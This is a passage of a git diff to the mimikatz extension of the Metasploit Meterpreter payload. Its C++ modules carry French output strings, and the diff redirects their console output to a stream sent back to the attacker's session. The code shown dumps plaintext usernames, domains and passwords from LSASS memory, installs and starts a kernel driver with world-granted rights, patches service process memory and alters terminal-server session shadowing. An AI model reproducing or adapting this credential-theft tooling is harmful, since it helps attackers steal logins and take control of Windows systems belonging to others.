endl; + } else (*outputStream) << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl; } if(hLSASS) @@ -206,26 +206,26 @@ void mod_mimikatz_sekurlsa::genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIA if(justSecurity) { if(!pos) - wcout << password; + (*outputStream) << password; else - wcout << endl << + (*outputStream) << endl << L"\t [" << *pos << L"] { " << rUserName << L" ; " << rDomainName << L" ; " << password << L" }"; } else { if(!pos) - wcout << endl << + (*outputStream) << endl << L"\t * Utilisateur : " << rUserName << endl << L"\t * Domaine : " << rDomainName << endl << L"\t * Mot de passe : " << password; else - wcout << endl << + (*outputStream) << endl << L"\t * [" << *pos << L"] Utilisateur : " << rUserName << endl << L"\t Domaine : " << rDomainName << endl << L"\t Mot de passe : " << password; } } - } else wcout << L"n.t. (LUID KO)"; + } else (*outputStream) << L"n.t. (LUID KO)"; } bool mod_mimikatz_sekurlsa::getLogonData(vector * mesArguments, vector> * mesProviders) @@ -242,7 +242,7 @@ bool mod_mimikatz_sekurlsa::getLogonData(vector * mesArguments, vector< { if(sessionData->LogonType != Network) { - wcout << endl << + (*outputStream) << endl << L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << @@ -250,18 +250,18 @@ bool mod_mimikatz_sekurlsa::getLogonData(vector * mesArguments, vector< for(vector>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) { - wcout << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t'; + (*outputStream) << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t'; monProvider->first(&sessions[i], mesArguments->empty()); - wcout << endl; + (*outputStream) << endl; } } LsaFreeReturnBuffer(sessionData); } - else wcout << L"Erreur : Impossible d\'obtenir les données de session" << endl; + else (*outputStream) << L"Erreur : Impossible d\'obtenir les données de session" << endl; } LsaFreeReturnBuffer(sessions); } - else wcout << L"Erreur : Impossible d\'énumerer les sessions courantes" << endl; + else (*outputStream) << L"Erreur : Impossible d\'énumerer les sessions courantes" << endl; return true; } @@ -327,7 +327,7 @@ bool mod_mimikatz_sekurlsa::searchPasswords(vector * arguments) mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(bPassword, donnees[2].MaximumLength); password.assign(mod_text::stringOrHex(bPassword, donnees[2].Length, 0, false)); } - wcout << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl; + (*outputStream) << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl; } if(bPassword) @@ -342,6 +342,6 @@ bool mod_mimikatz_sekurlsa::searchPasswords(vector * arguments) } } } - else wcout << L"Données LSASS en erreur" << endl; + else (*outputStream) << L"Données LSASS en erreur" << endl; return true; } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_service.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_service.cpp index 269d2426..47cd2b0f 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_service.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_service.cpp @@ -18,19 +18,19 @@ vector mod_mimikatz_service::getMimiKatzComm bool mod_mimikatz_service::start(vector * arguments) { - wcout << L"Démarrage de \'"; + (*outputStream) << L"Démarrage de \'"; return genericFunction(mod_service::start, arguments); } bool mod_mimikatz_service::stop(vector * arguments) { - wcout << L"Arrêt de \'"; + (*outputStream) << L"Arrêt de \'"; return genericFunction(mod_service::stop, arguments); } bool mod_mimikatz_service::remove(vector * arguments) { - wcout << L"Suppression de \'"; + (*outputStream) << L"Suppression de \'"; return genericFunction(mod_service::remove, arguments); } @@ -38,14 +38,14 @@ bool mod_mimikatz_service::genericFunction(PMOD_SERVICE_FUNC function, vectorempty()) { - wcout << arguments->front() << L"\' : "; + (*outputStream) << arguments->front() << L"\' : "; if(function(&arguments->front(), NULL)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO ; " << mod_system::getWinError(); + (*outputStream) << endl; } - else wcout << L"(null)\' - KO ; Nom de service manquant" << endl; + else (*outputStream) << L"(null)\' - KO ; Nom de service manquant" << endl; return true; } @@ -83,46 +83,46 @@ bool mod_mimikatz_service::list(vector * arguments) ) { if(monService->ServiceStatusProcess.dwProcessId != 0) - wcout << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId; - wcout << L'\t'; + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId; + (*outputStream) << L'\t'; if(monService->ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS) - wcout << L"INTERACTIVE_PROCESS" << L'\t'; + (*outputStream) << L"INTERACTIVE_PROCESS" << L'\t'; if(monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER) - wcout << L"FILE_SYSTEM_DRIVER" << L'\t'; + (*outputStream) << L"FILE_SYSTEM_DRIVER" << L'\t'; if(monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER) - wcout << L"KERNEL_DRIVER" << L'\t'; + (*outputStream) << L"KERNEL_DRIVER" << L'\t'; if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_OWN_PROCESS) - wcout << L"WIN32_OWN_PROCESS" << L'\t'; + (*outputStream) << L"WIN32_OWN_PROCESS" << L'\t'; if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_SHARE_PROCESS) - wcout << L"WIN32_SHARE_PROCESS" << L'\t'; + (*outputStream) << L"WIN32_SHARE_PROCESS" << L'\t'; switch(monService->ServiceStatusProcess.dwCurrentState) { case SERVICE_CONTINUE_PENDING: - wcout << L"CONTINUE_PENDING"; + (*outputStream) << L"CONTINUE_PENDING"; break; case SERVICE_PAUSE_PENDING: - wcout << L"PAUSE_PENDING"; + (*outputStream) << L"PAUSE_PENDING"; break; case SERVICE_PAUSED: - wcout << L"PAUSED"; + (*outputStream) << L"PAUSED"; break; case SERVICE_RUNNING: - wcout << L"RUNNING"; + (*outputStream) << L"RUNNING"; break; case SERVICE_START_PENDING: - wcout << L"START_PENDING"; + (*outputStream) << L"START_PENDING"; break; case SERVICE_STOP_PENDING: - wcout << L"STOP_PENDING"; + (*outputStream) << L"STOP_PENDING"; break; case SERVICE_STOPPED: - wcout << L"STOPPED"; + (*outputStream) << L"STOPPED"; break; } - wcout << L'\t' << + (*outputStream) << L'\t' << monService->serviceName << L'\t' << monService->serviceDisplayName << endl; @@ -130,7 +130,7 @@ bool mod_mimikatz_service::list(vector * arguments) } } else - wcout << L"mod_service::getList ; " << mod_system::getWinError() << endl; + (*outputStream) << L"mod_service::getList ; " << mod_system::getWinError() << endl; delete vectorServices; return true; @@ -145,7 +145,7 @@ bool mod_mimikatz_service::mimikatz(vector * arguments) { if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST) { - wcout << L"[*] Pilote mimikatz non présent, installation." << endl; + (*outputStream) << L"[*] Pilote mimikatz non présent, installation." << endl; wstring monPilote = L"mimikatz.sys"; wstring monPiloteComplet = L""; @@ -156,35 +156,35 @@ bool mod_mimikatz_service::mimikatz(vector * arguments) { if(monService = CreateService(monManager, L"mimikatz", L"mimikatz driver", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, monPiloteComplet.c_str(), NULL, NULL, NULL, NULL, NULL)) { - wcout << L"[+] Création du pilote : OK" << endl; + (*outputStream) << L"[+] Création du pilote : OK" << endl; if(mod_secacl::addWorldToMimikatz(&monService)) - wcout << L"[+] Attribution des droits : OK"; + (*outputStream) << L"[+] Attribution des droits : OK"; else - wcout << L"[-] Attribution des droits : KO ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"[-] Attribution des droits : KO ; " << mod_system::getWinError(); + (*outputStream) << endl; } - else wcout << L"[!] Impossible de créer le pilote ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"[!] Impossible de créer le pilote ; " << mod_system::getWinError() << endl; } - else wcout << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl; } - else wcout << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl; } - else wcout << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl; } - else wcout << L"[*] Pilote mimikatz déjà présent" << endl; + else (*outputStream) << L"[*] Pilote mimikatz déjà présent" << endl; if(monService) { if(StartService(monService, 0, NULL) != 0) - wcout << L"[+] Démarrage du pilote : OK"; + (*outputStream) << L"[+] Démarrage du pilote : OK"; else - wcout << L"[-] Démarrage du pilote : KO ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"[-] Démarrage du pilote : KO ; " << mod_system::getWinError(); + (*outputStream) << endl; CloseServiceHandle(monService); } CloseServiceHandle(monManager); } - else wcout << L"[!] Impossible d\'ouvrir le gestionnaire de service pour création ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"[!] Impossible d\'ouvrir le gestionnaire de service pour création ; " << mod_system::getWinError() << endl; return true; } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_standard.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_standard.cpp index 3a14803d..2732136b 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_standard.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_standard.cpp @@ -25,7 +25,7 @@ vector mod_mimikatz_standard::getMimiKatzCom bool mod_mimikatz_standard::version(vector * arguments) { - wcout << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl; + (*outputStream) << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl; return true; } @@ -51,13 +51,13 @@ bool mod_mimikatz_standard::exit(vector * arguments) bool mod_mimikatz_standard::reponse(vector * arguments) { - wcout << L"La réponse est 42." << endl; + (*outputStream) << L"La réponse est 42." << endl; return true; } bool mod_mimikatz_standard::cite(vector * arguments) { - wcout << L"I edit the world in HEX" << endl; + (*outputStream) << L"I edit the world in HEX" << endl; return true; } @@ -69,8 +69,8 @@ bool mod_mimikatz_standard::sleep(vector * arguments) wstringstream z; z << arguments->front(); z >> dwMilliseconds; } - wcout << L"Sleep : " << dwMilliseconds << L" ms... " << flush; + (*outputStream) << L"Sleep : " << dwMilliseconds << L" ms... " << flush; Sleep(dwMilliseconds); - wcout << L"Fin !" << endl; + (*outputStream) << L"Fin !" << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_system.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_system.cpp index 23e886be..44c495dc 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_system.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_system.cpp @@ -18,9 +18,9 @@ bool mod_mimikatz_system::user(vector * arguments) wstring monUser; if(mod_system::getUserName(&monUser)) - wcout << L"Utilisateur : " << monUser << endl; + (*outputStream) << L"Utilisateur : " << monUser << endl; else - wcout << L"mod_system::getUserName : " << mod_system::getWinError(); + (*outputStream) << L"mod_system::getUserName : " << mod_system::getWinError(); return true; } @@ -30,9 +30,9 @@ bool mod_mimikatz_system::computer(vector * arguments) wstring monComputer; if(mod_system::getComputerName(&monComputer)) - wcout << L"Ordinateur : " << monComputer << endl; + (*outputStream) << L"Ordinateur : " << monComputer << endl; else - wcout << L"mod_system::getComputerName : " << mod_system::getWinError(); + (*outputStream) << L"mod_system::getComputerName : " << mod_system::getWinError(); return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_terminalserver.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_terminalserver.cpp index 00bbc2fc..04fb8ab2 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_terminalserver.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_terminalserver.cpp @@ -23,10 +23,10 @@ bool mod_mimikatz_terminalserver::sessions(vector * arguments) if(mod_ts::getSessions(&mesSessions, (arguments->size() ? &arguments->front() : NULL))) { - wcout << L"SessId\tEtat\tstrEtat" << endl; + (*outputStream) << L"SessId\tEtat\tstrEtat" << endl; for(vector::iterator maSession = mesSessions.begin(); maSession != mesSessions.end(); maSession++) { - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << maSession->id << L'\t' << setw(5) << setfill(wchar_t(' ')) << maSession->state << L'\t' << setw(15) << setfill(wchar_t(' ')) << left << stateToType(maSession->state) << right << L'\t' << @@ -34,7 +34,7 @@ bool mod_mimikatz_terminalserver::sessions(vector * arguments) endl; } } - else wcout << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; return true; } @@ -45,10 +45,10 @@ bool mod_mimikatz_terminalserver::processes(vector * arguments) if(mod_ts::getProcesses(&mesProcess, (arguments->size() ? &arguments->front() : NULL))) { - wcout << L"PID\tSessId\tUtilisateur" << endl; + (*outputStream) << L"PID\tSessId\tUtilisateur" << endl; for(vector::iterator monProcess = mesProcess.begin(); monProcess != mesProcess.end(); monProcess++) { - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monProcess->pid << L'\t' << setw(5) << setfill(wchar_t(' ')) << monProcess->sessionId << L'\t' << setw(48) << setfill(wchar_t(' ')) << left << monProcess->userSid << right << L'\t' << @@ -56,7 +56,7 @@ bool mod_mimikatz_terminalserver::processes(vector * arguments) endl; } } - else wcout << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; return true; } @@ -110,7 +110,7 @@ bool mod_mimikatz_terminalserver::modifyshadow(vector * arguments) if(!strError) listAndOrModifySession(ptrSession, &newState); else - wcout << L"Erreur de parsing de l\'argument : " << strState << endl; + (*outputStream) << L"Erreur de parsing de l\'argument : " << strState << endl; } return true; @@ -175,38 +175,38 @@ bool mod_mimikatz_terminalserver::listAndOrModifySession(DWORD * id, DWORD * new { if((!id) || (maSession->id == *id)) { - wcout << L"@Winstation : " << addrWinstation << endl; + (*outputStream) << L"@Winstation : " << addrWinstation << endl; - wcout << L"\t" << maSession->prev << L" <-> " << maSession->next << endl; - wcout << L"\tid : " << maSession->id << endl; - wcout << L"\tname : " << maSession->name << endl; - wcout << L"\tsname : " << maSession->sname << endl; - wcout << L"\ttype : " << maSession->type << endl; - wcout << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl; + (*outputStream) << L"\t" << maSession->prev << L" <-> " << maSession->next << endl; + (*outputStream) << L"\tid : " << maSession->id << endl; + (*outputStream) << L"\tname : " << maSession->name << endl; + (*outputStream) << L"\tsname : " << maSession->sname << endl; + (*outputStream) << L"\ttype : " << maSession->type << endl; + (*outputStream) << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl; if(newState) { reussite = mod_memory::writeMemory(addrWinstation + FIELD_OFFSET(KIWI_TS_SESSION, shadow), newState, sizeof(DWORD), processHandle); - wcout << L"\t => " << *newState << L" (" < " << *newState << L" (" < * arguments) if(mod_thread::getList(vectorThreads, arguments->empty() ? NULL : &processId)) { - wcout << L"PID\tTID\tprTh" << endl; + (*outputStream) << L"PID\tTID\tprTh" << endl; for(vector::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++) - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' << setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' << setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri << endl; } else - wcout << L"mod_thread::getList ; " << mod_system::getWinError() << endl; + (*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl; delete vectorThreads; return true; @@ -47,17 +47,17 @@ bool mod_mimikatz_thread::resume(vector * arguments) if(threadId != 0) { - wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; + (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; if(mod_thread::resume(threadId)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_thread::resume ; " << mod_system::getWinError(); + (*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError(); } else - wcout << L"argument \'" << *monArgThread << L"\' invalide"; + (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - wcout << endl; + (*outputStream) << endl; } return true; @@ -71,17 +71,17 @@ bool mod_mimikatz_thread::suspend(vector * arguments) if(threadId != 0) { - wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; + (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; if(mod_thread::suspend(threadId)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); + (*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); } else - wcout << L"argument \'" << *monArgThread << L"\' invalide"; + (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - wcout << endl; + (*outputStream) << endl; } return true; @@ -95,17 +95,17 @@ bool mod_mimikatz_thread::stop(vector * arguments) if(threadId != 0) { - wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt "; + (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt "; if(mod_thread::stop(threadId)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_thread::stop ; " << mod_system::getWinError(); + (*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError(); } else - wcout << L"argument \'" << *monArgThread << L"\' invalide"; + (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - wcout << endl; + (*outputStream) << endl; } return true; @@ -120,17 +120,17 @@ bool mod_mimikatz_thread::quit(vector * arguments) if(threadId != 0) { - wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; + (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; if(mod_thread::quit(threadId)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_thread::quit ; " << mod_system::getWinError(); + (*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError(); } else - wcout << L"argument \'" << *monArgThread << L"\' invalide"; + (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - wcout << endl; + (*outputStream) << endl; } return true; diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_winmine.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_winmine.cpp index 13e52c45..024ba65d 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_winmine.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_winmine.cpp @@ -36,32 +36,32 @@ bool mod_mimikatz_winmine::infosOrCheat(vector * arguments, bool cheat) structMonDemineur monDemineur; if(mod_memory::readMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) { - wcout << L"Mines : " << monDemineur.nbMines << endl << + (*outputStream) << L"Mines : " << monDemineur.nbMines << endl << L"Dimension : " << monDemineur.hauteur << L" lignes x " << monDemineur.longueur << L" colonnes" << endl << L"Champ : " << endl << endl; for (DWORD y = 1; y <= monDemineur.hauteur; y++) { if(!cheat) - wcout << L'\t'; + (*outputStream) << L'\t'; for(DWORD x = 1; x <= monDemineur.longueur; x++) { BYTE laCase = monDemineur.tabMines[y][x]; if(!cheat) - wcout << L' ' << static_cast((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]); + (*outputStream) << L' ' << static_cast((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]); else if(laCase & 0x80) monDemineur.tabMines[y][x] = 0x4e; } if(!cheat) - wcout << endl; + (*outputStream) << endl; } if(cheat) { if(mod_memory::writeMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) - wcout << L"Patché ;)" << endl; + (*outputStream) << L"Patché ;)" << endl; vector mesHWNDS; if(mod_windows::getHWNDsFromProcessId(&mesHWNDS, maStruct->pidWinmine)) diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_patch.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_patch.cpp index f25d1165..420fd62b 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_patch.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_patch.cpp @@ -14,12 +14,12 @@ bool mod_patch::patchModuleOfService(wstring serviceName, wstring moduleName, BY { if(monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOPPED && monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOP_PENDING) { - wcout << L"Service : " << monService.serviceDisplayName << endl; + (*outputStream) << L"Service : " << monService.serviceDisplayName << endl; reussite = patchModuleOfPID(monService.ServiceStatusProcess.dwProcessId, moduleName, patternToSearch, szPatternToSearch, patternToPlace, szPatternToPlace, offsetForPlace); } - else wcout << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air très actif" << endl; + else (*outputStream) << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air très actif" << endl; } - else wcout << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl; return reussite; } @@ -36,21 +36,21 @@ bool mod_patch::patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternTo if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid)) { - wcout << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl; + (*outputStream) << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl; BYTE * addrPattern = NULL; if(mod_memory::searchMemory(baseAddr, baseAddr + taille, patternToSearch, &addrPattern, szPatternToSearch, true, processHandle)) { reussite = mod_memory::writeMemory(addrPattern + offsetForPlace, patternToPlace, szPatternToPlace, processHandle); - wcout << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl; + (*outputStream) << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl; } - else wcout << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; CloseHandle(processHandle); } - else wcout << L"OpenProcess : " << mod_system::getWinError() << endl; + else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl; } - else wcout << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl; return reussite; } @@ -95,7 +95,7 @@ bool mod_patch::checkVersion(KIWI_OS_CHECK * monOsValide) (monOsValide->is64 == is64) ; } - else wcout << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl; return reussite; } @@ -139,7 +139,7 @@ bool mod_patch::checkVersion(vector * vectorValid) } if(!reussite) - wcout << L"La version du système d\'exploitation actuelle n\'est pas supportée par cette fonction." << endl; + (*outputStream) << L"La version du système d\'exploitation actuelle n\'est pas supportée par cette fonction." << endl; return reussite; } diff --git a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj index e8f448a0..6b7b7ac2 100644 --- a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj +++ b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj @@ -239,6 +239,7 @@ + @@ -292,6 +293,8 @@ + + diff --git a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj.filters b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj.filters index ccf96059..23ba20e6 100644 --- a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj.filters @@ -150,6 +150,7 @@ modules + @@ -309,6 +310,8 @@ modules + +